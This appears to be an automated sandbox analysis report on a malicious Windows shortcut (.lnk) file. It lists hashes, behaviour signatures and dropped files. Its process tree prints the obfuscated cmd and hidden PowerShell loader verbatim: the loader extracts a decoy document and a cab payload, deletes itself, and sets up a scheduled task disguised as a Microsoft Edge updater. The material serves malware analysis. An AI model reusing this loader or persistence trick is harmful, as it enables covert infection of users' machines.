Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/06/2024, 04:49

General

  • Target

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

  • Size

    33.0MB

  • MD5

    cfffb45df8f05d1cb5d9d95fd5a83e9e

  • SHA1

    4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944

  • SHA256

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37

  • SHA512

    5426eb64c10ee748ab2ce0aad3d2b22045c837d6aff3e6da64b9bf9645ea99ca33ab6f7d92de924996eb7879ef65e7bcb607f621bd0483d592a8778e7919a319

  • SSDEEP

    768:vgAPVV/DKgF0JS3EaxNvnIBzHUUYNxHW0onSHzeN6ZC+v1ElH5qwpf2NyDkLmRvN:vtPu35RTnnSHzeNcfSfy6RvN

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Deletes itself
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3352
        • C:\Windows\SysWOW64\expand.exe
          "C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge
          4⤵
          • Drops file in Windows directory
          PID:3756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3872
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f
            5⤵
            • Creates scheduled task(s)
            PID:5092
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2252

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\ProgramData\MicrosoftEdge\parkon.pko

          Filesize

          1KB

          MD5

          f772107c865925631a56fac02f0c9631

          SHA1

          cdc8ee71f01c59c3362548f751ec2803b745c6bd

          SHA256

          e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894

          SHA512

          4efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235

        • C:\ProgramData\MicrosoftEdge\parkonA.bat

          Filesize

          2KB

          MD5

          a938e5c37311dabc48dc1d14c520b02a

          SHA1

          db9111dbb2eef7fb3482fa014bcea90c9b3df1f5

          SHA256

          fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f

          SHA512

          a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e

        • C:\ProgramData\MicrosoftEdge\parkonB.pko

          Filesize

          5KB

          MD5

          0d550d3c3fcc95dc191a9cb56f8d7fea

          SHA1

          e557278ee060b09fa227a0b9ef144e021763ecd5

          SHA256

          16ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564

          SHA512

          219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ziythu.2hi.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • \??\c:\programdata\microsoftedge\gewcdqa.cab

          Filesize

          1KB

          MD5

          bce6d6994700a3e05b4a22e3381a4d36

          SHA1

          6d3b8fd8c18f1daad940d3589890054fe5ff21b1

          SHA256

          623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154

          SHA512

          3dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e

        • memory/3352-18-0x0000000005F30000-0x0000000005F4E000-memory.dmp

          Filesize

          120KB

        • memory/3352-22-0x00000000064D0000-0x00000000064F2000-memory.dmp

          Filesize

          136KB

        • memory/3352-7-0x0000000005910000-0x0000000005976000-memory.dmp

          Filesize

          408KB

        • memory/3352-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

          Filesize

          136KB

        • memory/3352-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp

          Filesize

          3.3MB

        • memory/3352-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp

          Filesize

          4KB

        • memory/3352-19-0x0000000005F80000-0x0000000005FCC000-memory.dmp

          Filesize

          304KB

        • memory/3352-20-0x0000000006F30000-0x0000000006FC6000-memory.dmp

          Filesize

          600KB

        • memory/3352-21-0x0000000006480000-0x000000000649A000-memory.dmp

          Filesize

          104KB

        • memory/3352-6-0x00000000058A0000-0x0000000005906000-memory.dmp

          Filesize

          408KB

        • memory/3352-23-0x00000000077D0000-0x0000000007D74000-memory.dmp

          Filesize

          5.6MB

        • memory/3352-24-0x0000000008400000-0x0000000008A7A000-memory.dmp

          Filesize

          6.5MB

        • memory/3352-4-0x0000000074BF0000-0x00000000753A0000-memory.dmp

          Filesize

          7.7MB

        • memory/3352-3-0x0000000074BF0000-0x00000000753A0000-memory.dmp

          Filesize

          7.7MB

        • memory/3352-2-0x0000000005080000-0x00000000056A8000-memory.dmp

          Filesize

          6.2MB

        • memory/3352-1-0x0000000004980000-0x00000000049B6000-memory.dmp

          Filesize

          216KB

        • memory/3352-51-0x0000000074BF0000-0x00000000753A0000-memory.dmp

          Filesize

          7.7MB